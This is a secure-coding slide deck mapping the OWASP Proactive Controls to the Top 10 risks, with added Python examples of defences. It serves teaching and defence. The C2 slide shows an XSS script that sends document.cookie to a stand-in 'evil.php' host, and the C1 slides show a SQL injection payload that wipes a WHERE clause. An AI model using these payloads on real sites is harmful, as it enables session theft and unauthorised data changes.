OWASP Top Ten Mapping
Katy Anton
@katyanton
Katy Anton
• Software developer by background
• Certified Secure Software Lifecycle Practitioner (CSSLP)
• OWASP volunteer
• https//www.linkedin.com/in/katyanton
• @katyanton
OWASP Top 10 Risks
A1 - Injection
A2 - Broken Authentication and Session Management
A3 - Cross Site Scripting ( XSS )
A4 - Insecure Direct Object References
A5 - Security Misconfiguration
A6 - Sensitive Data Exposure
A7 - Missing Function Level Access Control
A8 - Cross-Site Request Forgery (CSRF)
A9 - Using Components with Known Vulnerabilities
A10- Unvalidated Redirects and Forwards
Software Development Lifecycle
(Figure: the four phases with the security activities that belong to each, on a scale from proactive at Design to reactive in Production.)
Design: security requirements, secure design, threat modelling
Build: coding guidelines, code reviews, static test tools
Test: security testing, dynamic testing tools
Production: vulnerability scanning
Warning
This is an awareness document
- that will give you some anchors
- that you can start using on a regular basis
- and start building on.
You cannot base a web application on Top 10 only!
C1. Parameterize queries
Query parameterization prevents untrusted input from being interpreted as part of a SQL command. Without it, the input is spliced straight into the statement text:
$sql = "Update users set email='$email' where id=1";
C1: Example of SQL injection
$email = "'; -- @owasp.org";
$sql = "UPDATE user SET email='$email' WHERE id='1'";
The statement the database receives (the quote closes the literal, the semicolon ends the statement and everything after -- is a comment, so the WHERE clause is discarded and every row is updated):
UPDATE user SET email=''; -- @owasp.org' WHERE id='1'
C1 Control: Data Access Layer
PHP: Example of Query Parametrisation
$email = $_REQUEST['email'];
$id = $_REQUEST['id'];
$stmt = $dbh->prepare("Update users set email=:new_email where id=:user_id");
$stmt->bindParam(':new_email', $email);
$stmt->bindParam(':user_id', $id);
$stmt->execute();
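The following is an added example in Python (not from the slides, which use PHP): it runs the slide's `'; -- @owasp.org` payload through a string-concatenated UPDATE and through a parameterized one, on an in-memory SQLite table constructed for the purpose. The table contents and the helper names are assumptions; the point is that the same payload rewrites every row in the first case and is stored as a harmless literal in the second.

```python
import sqlite3

def make_db():
    """Constructed sample data: two users in an in-memory SQLite database."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE user (id INTEGER PRIMARY KEY, email TEXT)")
    db.executemany("INSERT INTO user VALUES (?, ?)",
                   [(1, "alice@example.org"), (2, "bob@example.org")])
    db.commit()
    return db

# The payload from the slides: the quote closes the literal, ';' ends the
# statement and '--' turns the rest (including WHERE) into a comment.
PAYLOAD = "'; -- @owasp.org"

def update_email_concat(db, user_id, email):
    """Vulnerable form: untrusted input is spliced into the SQL text.
    executescript() stands in for a driver that accepts several statements."""
    sql = f"UPDATE user SET email='{email}' WHERE id='{user_id}'"
    db.executescript(sql)
    db.commit()
    return sql

def update_email_param(db, user_id, email):
    """Parameterized form: the statement is compiled first, the values are
    sent separately, so no value can change the statement's structure."""
    db.execute("UPDATE user SET email=? WHERE id=?", (email, user_id))
    db.commit()

def emails(db):
    """Return {id: email} so the effect of each update can be inspected."""
    return dict(db.execute("SELECT id, email FROM user ORDER BY id"))

if __name__ == "__main__":
    db = make_db()
    print(update_email_concat(db, "1", PAYLOAD))   # WHERE clause commented away
    print(emails(db))                              # every email is now ''
    db = make_db()
    update_email_param(db, 1, PAYLOAD)
    print(emails(db))                              # only id 1 changed, payload stored verbatim
```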
Proactive Control: C1 Parameterize Queries
Leave it to the data access layer to decide how parameters are interpreted before executing SQL.
Risk(s) prevented: A1 Injection
Injection flaws, such as SQL injection, occur when untrusted data is sent to an interpreter as part of a command or query.
C2. Encode data before using a parser
C2: Example of XSS
<script type="text/javascript">
var adr = 'http://myaddress.com/evil.php?stolencookies=' + escape(document.cookie);
var img = new Image();
img.src = adr;
</script>
C2: Mechanisms for encoding
Change from
<
to
&lt;
C2: Resources
Reform Project
Java, .NET v1/v2, PHP, Python, Perl, JavaScript
https://www.owasp.org/index.php/Category:OWASP_Encoding_Project
Java/Scala (Updated January 2015)
https://www.owasp.org/index.php/OWASP_Java_Encoder_Project
Proactive Control: C2 Encode Data
Encode data before use in a parser (JS, CSS, XML).
Risk(s) prevented: A1 Injection
Injection flaws, such as SQL injection, occur when untrusted data is sent to an interpreter as part of a command or query.
A3 XSS
XSS allows attackers to execute scripts in the victim's browser, which can hijack user sessions, deface web sites, or redirect the user to malicious sites.
C3. Validate all input
C3: Example of Validations
• GET / POST data
• File upload: validate file extension, MIME type, size
• HTTP headers, cookies
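An added example (Python; not from the slides) of the three validations just listed plus the redirect check the control is mapped to: a GET/POST id parameter checked against an allowlist pattern, a file upload whose extension, declared MIME type, leading bytes and size must all agree, and a redirect target that must be one of a fixed set of relative paths. The size limit, the allowed types and the function names are assumptions.

```python
import re
from dataclasses import dataclass

MAX_UPLOAD_BYTES = 2 * 1024 * 1024          # assumed policy: 2 MiB
# allowed extension -> (MIME type the client must declare, leading magic bytes)
ALLOWED_FILES = {
    "png": ("image/png", b"\x89PNG\r\n\x1a\n"),
    "jpg": ("image/jpeg", b"\xff\xd8\xff"),
}
ID_PATTERN = re.compile(r"[1-9][0-9]{0,9}")  # positive integer, bounded length
ALLOWED_REDIRECTS = ("/home", "/account")     # assumed set of safe relative paths

class ValidationError(ValueError):
    pass

def validate_id(raw: str) -> int:
    """Allowlist validation of a GET/POST parameter: shape first, then convert."""
    if not ID_PATTERN.fullmatch(raw):
        raise ValidationError("id must be a positive integer")
    return int(raw)

@dataclass
class Upload:
    filename: str
    mime_type: str      # as declared by the client; never trusted on its own
    content: bytes

def validate_upload(up: Upload) -> str:
    """Extension, declared MIME type, actual content and size must all agree;
    returns the canonical extension to use when storing the file."""
    if len(up.content) > MAX_UPLOAD_BYTES:
        raise ValidationError("file too large")
    ext = up.filename.rsplit(".", 1)[-1].lower() if "." in up.filename else ""
    if ext not in ALLOWED_FILES:
        raise ValidationError("file type not allowed")
    expected_mime, magic = ALLOWED_FILES[ext]
    if up.mime_type != expected_mime:
        raise ValidationError("declared MIME type does not match extension")
    if not up.content.startswith(magic):
        raise ValidationError("file content does not match extension")
    return ext

def validate_redirect(target: str) -> str:
    """A10: only redirect to known relative paths, never to a caller-supplied host."""
    if target in ALLOWED_REDIRECTS:
        return target
    raise ValidationError("redirect target not allowed")

def check(fn, *args):
    """Return None on success or the validation message, for callers that
    collect errors instead of catching exceptions."""
    try:
        fn(*args)
        return None
    except ValidationError as e:
        return str(e)

if __name__ == "__main__":
    # constructed inputs: a valid PNG header, and a PHP file renamed to .png
    good = Upload("photo.PNG", "image/png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16)
    fake = Upload("shell.php.png", "image/png", b"<?php echo 1; ?>")
    print(check(validate_upload, good), check(validate_upload, fake))
    print(check(validate_id, "42"), check(validate_id, "42; DROP TABLE user"))
    print(check(validate_redirect, "/home"), check(validate_redirect, "http://evil.example/"))
```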
Proactive Control: C3 Validate all inputs
For web applications this includes:
• GET and POST parameters
• File uploads
Any or all of this data could be manipulated by an attacker.
Risk(s) prevented:
• A1 Injection
• A3 XSS
• A10 Unvalidated redirects and forwards
C4. Implement appropriate Access Control
C4: Access Control good practices
• Deny by default
• Force all requests to go through access control checks
• Check on the server when each function is accessed
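The three practices above, as an added Python example that is not part of the slides: permissions are an explicit allowlist (deny by default), every handler is routed through one decorator (a single choke point, evaluated on the server), and the handler also checks that the referenced object belongs to the caller, which is the A4 case. Roles, permissions, invoices and function names are constructed for the example.

```python
from functools import wraps

class Forbidden(Exception):
    pass

# Constructed sample data. Permissions are an explicit allowlist; anything
# not listed is denied, including unknown roles.
ROLE_PERMISSIONS = {
    "admin": {"invoice:read", "invoice:delete", "user:list"},
    "customer": {"invoice:read"},
}
INVOICES = {101: {"owner": "alice", "total": 120},
            102: {"owner": "bob", "total": 80}}

class User:
    def __init__(self, name, role):
        self.name, self.role = name, role

def is_allowed(user, permission) -> bool:
    """Single decision point: deny unless the role is known and lists the permission."""
    return permission in ROLE_PERMISSIONS.get(user.role, set())

def requires(permission):
    """Every handler goes through this check on the server, whatever the UI
    showed or hid from the user (A7)."""
    def deco(fn):
        @wraps(fn)
        def wrapper(user, *args, **kwargs):
            if not is_allowed(user, permission):
                raise Forbidden(f"{user.name} lacks {permission}")
            return fn(user, *args, **kwargs)
        return wrapper
    return deco

@requires("invoice:read")
def get_invoice(user, invoice_id):
    """Function-level check (decorator) plus object-level ownership check (A4):
    a customer may read only their own invoices; admins may read any."""
    inv = INVOICES.get(invoice_id)
    if inv is None or (user.role != "admin" and inv["owner"] != user.name):
        # Same answer for "missing" and "not yours": no existence oracle.
        raise Forbidden("no such invoice")
    return inv

@requires("invoice:delete")
def delete_invoice(user, invoice_id):
    return INVOICES.pop(invoice_id, None) is not None

def attempt(fn, *args):
    """Return ('ok', result) or ('denied', message); the 'denied' branch is
    where an audit log entry belongs."""
    try:
        return ("ok", fn(*args))
    except Forbidden as e:
        return ("denied", str(e))

if __name__ == "__main__":
    alice, guest = User("alice", "customer"), User("guest", "anonymous")
    print(attempt(get_invoice, alice, 101))   # ('ok', {...})
    print(attempt(get_invoice, alice, 102))   # ('denied', 'no such invoice')
    print(attempt(get_invoice, guest, 101))   # ('denied', 'guest lacks invoice:read')
```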
Proactive Control: C4 Implement Appropriate Access Controls
• Deny by default
• Force all requests to go through access control checks
• Check on the server when each function is accessed
Risk(s) prevented: A4 Insecure Direct Object References
A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or database key. Without an access control check, attackers can manipulate these references to access unauthorised data.
A7 Missing Function Level Access Control
Attackers will be able to forge requests in order to access functionality without proper authorization.
C5. Establish Authentication and Identity Controls
1). Protection: Password storage
1) Use a cryptographically strong, credential-specific salt
• protect([salt] + [password]);
• Use a 32-char or 64-char salt;
• Do not depend on hiding, splitting, or otherwise obscuring the salt.
1). Protection: Password storage
2) Impose difficult verification on the attacker and defender
• PBKDF2([salt] + [password], c=100,000);
• Cryptographic recommendations:
  • PBKDF2 (Password-Based Key Derivation Function 2)
  • bcrypt
  • scrypt
1). Protection: Password storage
Resources:
https://www.owasp.org/index.php/Password_Storage_Cheat_Sheet
2). Protection: multi-factor authentication
Multi-factor authentication - a combination of:
• Something you know – password or PIN
• Something you own – token, smart card or phone
• Something you are – biometrics (fingerprint)
3). Protection: Forgot Password
Forgot password design:
1). Ask one or more security questions
2). Send the user a randomly generated token via: app, SMS
3). Verify the code in the same web session.
4). Change the password.
More details on:
https://www.owasp.org/index.php/Forgot_Password_Cheat_Sheet
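An added Python example (not from the slides) covering both the password-storage slides and the forgot-password flow above: `hash_password` applies the slide's PBKDF2 with c=100,000 and a random 32-byte salt that is stored in the clear next to the hash; `start_reset`/`finish_reset` implement steps 2 to 4 of the forgot-password design (random token, verified only in the session that requested it, single use, time-limited, then the password is replaced). Step 1 (security questions) is left out. The storage format, the 15-minute token lifetime and all function names are assumptions.

```python
import hashlib
import hmac
import secrets
import time

PBKDF2_ITERATIONS = 100_000   # the slide's c=100,000
SALT_BYTES = 32               # the slide's "32-char" salt, here 32 random bytes
TOKEN_TTL_SECONDS = 15 * 60   # assumed policy for reset tokens

def hash_password(password: str, iterations: int = PBKDF2_ITERATIONS) -> str:
    """Return 'pbkdf2_sha256$iterations$salt_hex$hash_hex'. The salt is
    random per credential and stored alongside the hash; nothing depends on
    keeping it secret, only on it being unique and unpredictable."""
    salt = secrets.token_bytes(SALT_BYTES)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"

def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; compare in constant time."""
    algo, iters, salt_hex, hash_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), hash_hex)

# Forgot-password state: session_id -> (username, sha256(token), expires_at).
# Only the token's hash is kept server-side, like a password.
_pending = {}

def start_reset(session_id: str, username: str, now=None) -> str:
    """Step 2: create a random token bound to this web session and return it
    for out-of-band delivery (app or SMS); the caller must not echo it to the page."""
    t = now if now is not None else time.time()
    token = secrets.token_urlsafe(32)
    _pending[session_id] = (username,
                            hashlib.sha256(token.encode()).hexdigest(),
                            t + TOKEN_TTL_SECONDS)
    return token

def finish_reset(session_id: str, token: str, new_password: str,
                 users: dict, now=None) -> bool:
    """Steps 3-4: the code is valid only in the session that started the
    reset, exactly once, and before expiry; on success the stored hash is
    replaced. Any failure consumes the pending reset."""
    t = now if now is not None else time.time()
    entry = _pending.pop(session_id, None)
    if entry is None:
        return False
    username, token_hash, expires_at = entry
    if t > expires_at:
        return False
    presented = hashlib.sha256(token.encode()).hexdigest()
    if not hmac.compare_digest(presented, token_hash):
        return False
    users[username] = hash_password(new_password)
    return True

if __name__ == "__main__":
    users = {"alice": hash_password("correct horse")}      # constructed account
    print(verify_password("correct horse", users["alice"]))  # True
    token = start_reset("sess-1", "alice")
    print(finish_reset("sess-2", token, "new pass", users))  # False: other session
    token = start_reset("sess-1", "alice")
    print(finish_reset("sess-1", token, "new pass", users))  # True
    print(verify_password("new pass", users["alice"]))       # True
```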
Proactive Control: C5 Establish Identity and Authentication Controls
• Design (password storage)
• Multi-factor authentication
• Design (forgot password)
Risk(s) prevented: A2 Broken Authentication and Session Management
Application functions related to authentication and session management are often not implemented correctly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users' identities.
C6. Data Protection and Privacy
C6 Controls: Data in transit
Data in transit: HTTPS
• Confidentiality: a spy cannot view your data
• Integrity: a spy cannot change your data
• Authenticity: the server you are visiting is the right one
HTTPS configuration best practices:
• https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet
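The authenticity property above is the one most often thrown away on the client side. As an added example (Python's standard `ssl` module; not from the slides), the weak client configuration that disables certificate and hostname checks is shown beside the hardened one that verifies both and refuses protocol versions below TLS 1.2; `context_report` summarises either so a code review or test can assert on it. The function names and the chosen minimum version are assumptions.

```python
import ssl

def weak_client_context() -> ssl.SSLContext:
    """The "make the certificate warning go away" configuration: the server's
    certificate is never checked, so any host on the path can impersonate it.
    check_hostname must be cleared before verify_mode, or ssl raises."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    return ctx

def hardened_client_context() -> ssl.SSLContext:
    """Chain and hostname are verified against the platform trust store and
    TLS 1.0/1.1 are refused; pass this as context= to urllib/http.client."""
    ctx = ssl.create_default_context()          # CERT_REQUIRED + check_hostname
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    return ctx

def context_report(ctx: ssl.SSLContext) -> dict:
    """Flatten the settings that decide the three HTTPS properties."""
    return {
        "verifies_chain": ctx.verify_mode == ssl.CERT_REQUIRED,
        "verifies_hostname": bool(ctx.check_hostname),
        "min_version": ctx.minimum_version.name,
    }

if __name__ == "__main__":
    print("weak:    ", context_report(weak_client_context()))
    print("hardened:", context_report(hardened_client_context()))
    # usage: urllib.request.urlopen(url, context=hardened_client_context())
```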
C6 Controls: Data at rest
1. Algorithm
• AES (Advanced Encryption Standard)
2. Secure key management
3. Adequate access controls and auditing
Resources:
• https://www.owasp.org/index.php/Cryptographic_Storage_Cheat_Sheet
• https://www.ssllabs.com/ssltest/index.html
Proactive Control: C6 Data Protection and privacy
• Data encryption at rest
• Data encryption in transit
Risk(s) prevented: A6 Sensitive Data Exposure
Sensitive data needs extra protection such as encryption at rest or in transit, as well as special precautions when exchanged with the browser.
OWASP Top Ten Mapping
Proactive Control -> Risk(s) prevented
C1: Parameterize Queries (leave it to the data access layer to decide how parameters are interpreted before executing SQL)
• A1 Injection
• A10 Unvalidated redirects and forwards
C2: Encode Data (encode data before use in a parser: JS, CSS, XML)
• A1 Injection
• A3 XSS
C3: Validate all inputs
• A1 Injection
• A3 XSS
• A10 Unvalidated redirects and forwards
C4: Implement Appropriate Access Controls
• A4 Insecure Direct Object References
• A7 Missing Function Level Access Control
C5: Establish Identity and Authentication Controls (password storage / multi-factor authentication / forgot password design)
• A2 Broken Authentication and Session Management
C6: Data Protection and privacy (data encryption at rest / in transit)
• A6 Sensitive Data Exposure
C7. Logging, Error Handling and Intrusion Detection
Proactive Control: C7 Implement Logging, Error Handling and Intrusion Detection
Risk(s) prevented:
• A1 Injection
• A2 Broken Authentication and Session Management
• A3 XSS
• A4 Insecure Direct Object References
• A5 Security Misconfiguration
• A6 Sensitive Data Exposure
• A7 Missing Function Level Access Control
• A8 Cross-Site Request Forgery (CSRF)
• A9 Using Components with Known Vulnerabilities
• A10 Unvalidated Redirects and Forwards
C8. Leverage Security Features of Frameworks and Security Libraries
Proactive Control: C8 Leverage Security Features of Frameworks and Security Libraries
For example:
• Choose a good database ORM
• Choose a framework with good access control already built in
• Choose a framework that already has integrated CSRF protection
Risk(s) prevented:
• A1 Injection
• A2 Broken Authentication and Session Management
• A3 XSS
• A4 Insecure Direct Object References
• A5 Security Misconfiguration
• A6 Sensitive Data Exposure
• A7 Missing Function Level Access Control
• A8 Cross-Site Request Forgery (CSRF)
• A9 Using Components with Known Vulnerabilities
• A10 Unvalidated Redirects and Forwards
C9. Security Requirements
C9: Security Requirements
Functional requirements:
> visible to QA and testable
> e.g. forgot password workflow, re-authentication during change password
Non-functional requirements:
> invisible to QA, not easily testable
> e.g. query parametrization, password storage crypto
Proactive Control: C9 Security Requirements
Example of security requirements:
• Integrity requirements
• Availability requirements
• Authentication & authorization requirements
• Confidentiality requirements
• Auditing and logging requirements
• Session management requirements
• Errors and exception management requirements
• Configuration parameters requirements
• Archiving requirements
• Legal and Compliance Constraints
Risk(s) prevented:
• A1 Injection
• A2 Broken Authentication and Session Management
• A3 XSS
• A4 Insecure Direct Object References
• A5 Security Misconfiguration
• A6 Sensitive Data Exposure
• A7 Missing Function Level Access Control
• A8 Cross-Site Request Forgery (CSRF)
• A9 Using Components with Known Vulnerabilities
• A10 Unvalidated Redirects and Forwards
C10. Security Architecture and Design
C10: Security Architecture and Design Principles
Secure design principles:
• Least Privilege = minimum access level for the minimum amount of time
• Separation of duties
• Defence in depth, e.g.:
  • input validation + parameterized queries
  • input validation + output encoding
• Fail secure, e.g.:
  • user access denied after the maximum number of failed logins is reached
  • errors and exception handling: store the error details in the database, give the user only the reference ID
• Complete mediation, e.g.:
  • centralise access control checks
  • centralise input validation
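The two "fail secure" examples above, as an added Python example (not from the slides): `login` refuses an account once the maximum number of consecutive failures is reached, for a lockout period, even if the next password is correct, and returns the same generic outcome whether the user is unknown or the password is wrong; `handle_error` keeps the exception detail server-side under a random reference and hands the user only that reference. Every failure and lockout is also logged, which is the raw material for the intrusion detection named in C7. The thresholds, the store and the function names are assumptions.

```python
import logging
import secrets
import time
from collections import defaultdict

MAX_FAILED_LOGINS = 5          # assumed policy
LOCKOUT_SECONDS = 15 * 60      # assumed policy
_failed = defaultdict(int)     # username -> consecutive failures
_locked_until = {}             # username -> unix time the lock expires
_error_store = {}              # reference id -> detail, never sent to the user
log = logging.getLogger("auth")

def login(username: str, password: str, users: dict, verify, now=None) -> str:
    """Fail secure: returns 'ok', 'denied' or 'locked'. Once MAX_FAILED_LOGINS
    is reached the account stays 'locked' for LOCKOUT_SECONDS regardless of
    the password; unknown user and wrong password both yield 'denied'."""
    t = now if now is not None else time.time()
    if _locked_until.get(username, 0) > t:
        return "locked"
    stored = users.get(username)
    if stored is not None and verify(password, stored):
        _failed.pop(username, None)
        return "ok"
    _failed[username] += 1
    log.warning("failed login user=%s count=%d", username, _failed[username])
    if _failed[username] >= MAX_FAILED_LOGINS:
        _locked_until[username] = t + LOCKOUT_SECONDS
        _failed.pop(username, None)
        log.warning("account locked user=%s until=%d", username, _locked_until[username])
        return "locked"
    return "denied"

def handle_error(exc: Exception) -> str:
    """Store exception detail server-side under a random reference and
    return only the reference; the detail goes to the log, not the page."""
    ref = secrets.token_hex(8)
    _error_store[ref] = f"{type(exc).__name__}: {exc}"
    log.error("ref=%s %s", ref, _error_store[ref])
    return ref

def user_message(ref: str) -> str:
    """What the user sees: no stack trace, no internal detail."""
    return f"Something went wrong. Please quote reference {ref}."

def error_detail(ref: str):
    """What support staff look up from the reference."""
    return _error_store.get(ref)

if __name__ == "__main__":
    users = {"alice": "s3cret"}                  # constructed; plain text only for the demo
    verify = lambda presented, stored: presented == stored
    for _ in range(MAX_FAILED_LOGINS):
        print(login("alice", "wrong", users, verify, now=100))  # denied x4, then locked
    print(login("alice", "s3cret", users, verify, now=100))     # locked: right password, too late
    ref = handle_error(ZeroDivisionError("division by zero"))
    print(user_message(ref), "|", error_detail(ref))
```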
Proactive Control: C10 Security Architecture and Design
Secure design principles:
• Least Privilege
• Separation of duties
• Defence in depth
• Fail secure
• Complete mediation
• Open design
Risk(s) prevented:
• A1 Injection
• A2 Broken Authentication and Session Management
• A3 XSS
• A4 Insecure Direct Object References
• A5 Security Misconfiguration
• A6 Sensitive Data Exposure
• A7 Missing Function Level Access Control
• A8 Cross-Site Request Forgery (CSRF)
• A9 Using Components with Known Vulnerabilities
• A10 Unvalidated Redirects and Forwards
Thank you
Questions
50

More Related Content

What's hot (20)

PDF
BlackHat Arsenal 2014 - C-SCAD : Assessing Security Flaws in C-SCAD WebX Clie...
Aditya K Sood
 
PDF
OWASP Top 10 2017
Siddharth Phatarphod
 
PPTX
Owasp 2017 oveview
Shreyas N
 
PPTX
How to Test for The OWASP Top Ten
Security Innovation
 
PDF
Owasp top 10
YasserElsnbary
 
PPTX
OWASP Top 10 2017 rc1 - The Ten Most Critical Web Application Security Risks
Andre Van Klaveren
 
PPTX
Owasp top 10 2017
ibrahimumer2
 
PPT
Web attacks
husnara mohammad
 
PPTX
Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...
Security Innovation
 
PPTX
Ten Commandments of Secure Coding
Mateusz Olejarka
 
PPTX
Beyond the OWASP Top 10
iphonepentest
 
PPTX
Owasp top 10 vulnerabilities
OWASP Delhi
 
PPTX
OWASP Top 10 2017 - New Vulnerabilities
Dilum Bandara
 
PDF
Beyond OWASP Top 10 - TASK October 2017
Aaron Hnatiw
 
PDF
OWASP TOP 10 & .NET
Daniel Krasnokucki
 
PDF
Problems with parameters b sides-msp
Mike Saunders
 
PDF
Owasp Top 10
Shivam Porwal
 
PDF
Security Automation Simplified via NIST OSCAL: We’re Not in Kansas Anymore
Priyanka Aash
 
PDF
THOR Apt Scanner
Florian Roth
 
PPTX
Why Johnny Still Can’t Pentest: A Comparative Analysis of Open-source Black-...
Rana Khalil
 
BlackHat Arsenal 2014 - C-SCAD : Assessing Security Flaws in C-SCAD WebX Clie...
Aditya K Sood
 
OWASP Top 10 2017
Siddharth Phatarphod
 
Owasp 2017 oveview
Shreyas N
 
How to Test for The OWASP Top Ten
Security Innovation
 
Owasp top 10
YasserElsnbary
 
OWASP Top 10 2017 rc1 - The Ten Most Critical Web Application Security Risks
Andre Van Klaveren
 
Owasp top 10 2017
ibrahimumer2
 
Web attacks
husnara mohammad
 
Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...
Security Innovation
 
Ten Commandments of Secure Coding
Mateusz Olejarka
 
Beyond the OWASP Top 10
iphonepentest
 
Owasp top 10 vulnerabilities
OWASP Delhi
 
OWASP Top 10 2017 - New Vulnerabilities
Dilum Bandara
 
Beyond OWASP Top 10 - TASK October 2017
Aaron Hnatiw
 
OWASP TOP 10 & .NET
Daniel Krasnokucki
 
Problems with parameters b sides-msp
Mike Saunders
 
Owasp Top 10
Shivam Porwal
 
Security Automation Simplified via NIST OSCAL: We’re Not in Kansas Anymore
Priyanka Aash
 
THOR Apt Scanner
Florian Roth
 
Why Johnny Still Can’t Pentest: A Comparative Analysis of Open-source Black-...
Rana Khalil
 

Viewers also liked (20)

PDF
State of OWASP 2015
tmd800
 
PDF
Web hackingtools 2015
ColdFusionConference
 
PPTX
Appsecurity, win or loose
Bjørn Sloth
 
PDF
OWASP AppSec USA 2015, San Francisco
Clare Nelson, CISSP, CIPP-E
 
PPTX
OWASP Open SAMM
intive
 
PDF
2013 OWASP Top 10
bilcorry
 
PDF
OWASP, PHP, life and universe
Sebastien Gioria
 
ODP
OWASP 2015 AppSec EU ZAP 2.4.0 and beyond..
Simon Bennetts
 
PPTX
Web Application Security | A developer's perspective - Insecure Direct Object...
n|u - The Open Security Community
 
PDF
Rebooting Software Development - OWASP AppSecUSA
Nick Galbreath
 
KEY
Owasp Au Rev4
sumsid1234
 
PPTX
Owasp top 10 security threats
Vishal Kumar
 
PDF
OWASP OWTF - Summer Storm - OWASP AppSec EU 2013
Abraham Aranguren
 
PPTX
OWASP Free Training - SF2014 - Keary and Manico
Eoin Keary
 
PPTX
RSA Europe 2013 OWASP Training
Jim Manico
 
PDF
OWASP Top Ten in Practice
Security Innovation
 
PPTX
Owasp Top 10 A1: Injection
Michael Hendrickx
 
ODP
Basic of SSDLC
Chitpong Wuttanan
 
PPTX
The OWASP Zed Attack Proxy
Aditya Gupta
 
PPTX
[Wroclaw #5] OWASP Projects: beyond Top 10
OWASP
 
State of OWASP 2015
tmd800
 
Web hackingtools 2015
ColdFusionConference
 
Appsecurity, win or loose
Bjørn Sloth
 
OWASP AppSec USA 2015, San Francisco
Clare Nelson, CISSP, CIPP-E
 
OWASP Open SAMM
intive
 
2013 OWASP Top 10
bilcorry
 
OWASP, PHP, life and universe
Sebastien Gioria
 
OWASP 2015 AppSec EU ZAP 2.4.0 and beyond..
Simon Bennetts
 
Web Application Security | A developer's perspective - Insecure Direct Object...
n|u - The Open Security Community
 
Rebooting Software Development - OWASP AppSecUSA
Nick Galbreath
 
Owasp Au Rev4
sumsid1234
 
Owasp top 10 security threats
Vishal Kumar
 
OWASP OWTF - Summer Storm - OWASP AppSec EU 2013
Abraham Aranguren
 
OWASP Free Training - SF2014 - Keary and Manico
Eoin Keary
 
RSA Europe 2013 OWASP Training
Jim Manico
 
OWASP Top Ten in Practice
Security Innovation
 
Owasp Top 10 A1: Injection
Michael Hendrickx
 
Basic of SSDLC
Chitpong Wuttanan
 
The OWASP Zed Attack Proxy
Aditya Gupta
 
[Wroclaw #5] OWASP Projects: beyond Top 10
OWASP
 
Ad

Similar to Owasp top-ten-mapping-2015-05-lwc (20)

PPTX
OWASP Top 10 Proactive Controls
Katy Anton
 
PDF
OWASP Top 10 Web Vulnerabilities from DCC 04/14
Chris Holwerda
 
PPT
Sergey Kochergan - OWASP Top 10 Web Application Vulnerabilities
Braindev Kyiv
 
PDF
Secure coding presentation Oct 3 2020
Moataz Kamel
 
PPTX
The path of secure software by Katy Anton
DevSecCon
 
PPTX
OWASP top 10-2013
tmd800
 
PDF
Owasp Top 10-2013
n|u - The Open Security Community
 
PPTX
Owasp top 10_-_2010 presentation
Islam Azeddine Mennouchi
 
PPTX
Security For Application Development
6502programmer
 
PDF
Web application sec_3
vhimsikal
 
PPTX
OWASP Top Ten 2017
Michael Furman
 
PPT
Secure code practices
Hina Rawal
 
PDF
Top 10 web application security risks akash mahajan
Akash Mahajan
 
PPTX
OWASP_Top_Ten_Proactive_Controls_v2.pptx
FernandoVizer
 
PPTX
ASP.NET security vulnerabilities
Aleksandar Bozinovski
 
PDF
Threat Modeling for Web Applications (and other duties as assigned)
Mike Tetreault
 
PPTX
owasp top 10 security risk categories and CWE
Arun Voleti
 
PPTX
Secure Software Engineering
Rohitha Liyanagama
 
PDF
owasp-top-10 presentation dhs ad health .
Soner ÇELİK, CEH, PMP
 
PDF
OWASP Top 10
Arthur Shvetsov
 
OWASP Top 10 Proactive Controls
Katy Anton
 
OWASP Top 10 Web Vulnerabilities from DCC 04/14
Chris Holwerda
 
Sergey Kochergan - OWASP Top 10 Web Application Vulnerabilities
Braindev Kyiv
 
Secure coding presentation Oct 3 2020
Moataz Kamel
 
The path of secure software by Katy Anton
DevSecCon
 
OWASP top 10-2013
tmd800
 
Owasp top 10_-_2010 presentation
Islam Azeddine Mennouchi
 
Security For Application Development
6502programmer
 
Web application sec_3
vhimsikal
 
OWASP Top Ten 2017
Michael Furman
 
Secure code practices
Hina Rawal
 
Top 10 web application security risks akash mahajan
Akash Mahajan
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
FernandoVizer
 
ASP.NET security vulnerabilities
Aleksandar Bozinovski
 
Threat Modeling for Web Applications (and other duties as assigned)
Mike Tetreault
 
owasp top 10 security risk categories and CWE
Arun Voleti
 
Secure Software Engineering
Rohitha Liyanagama
 
owasp-top-10 presentation dhs ad health .
Soner ÇELİK, CEH, PMP
 
OWASP Top 10
Arthur Shvetsov
 
Ad

Recently uploaded (20)

PDF
MiniTool Power Data Recovery Crack New Pre Activated Version Latest 2025
imang66g
 
PDF
How Agentic AI Networks are Revolutionizing Collaborative AI Ecosystems in 2025
ronakdubey419
 
PDF
System Center 2025 vs. 2022; What’s new, what’s next_PDF.pdf
Q-Advise
 
PDF
advancepresentationskillshdhdhhdhdhdhhfhf
jasmenrojas249
 
PDF
Using licensed Data Loss Prevention (DLP) as a strategic proactive data secur...
Q-Advise
 
PDF
Enhancing Healthcare RPM Platforms with Contextual AI Integration
Cadabra Studio
 
PPTX
TexSender Pro 8.9.1 Crack Full Version Download
cracked shares
 
PPT
Brief History of Python by Learning Python in three hours
adanechb21
 
PPTX
ChessBase 18.02 Crack + Serial Key Free Download
cracked shares
 
PDF
Malaysia’s e-Invoice System: A Complete Guide for Businesses
Matiyas Solutions
 
PDF
Applitools Platform Pulse: What's New and What's Coming - July 2025
Applitools
 
PDF
Why Are More Businesses Choosing Partners Over Freelancers for Salesforce.pdf
Cymetrix Software
 
PDF
Generating Union types w/ Static Analysis
K. Matthew Dupree
 
PDF
AI Software Engineering based on Multi-view Modeling and Engineering Patterns
Hironori Washizaki
 
PDF
Virtual Threads in Java: A New Dimension of Scalability and Performance
Tier1 app
 
PPTX
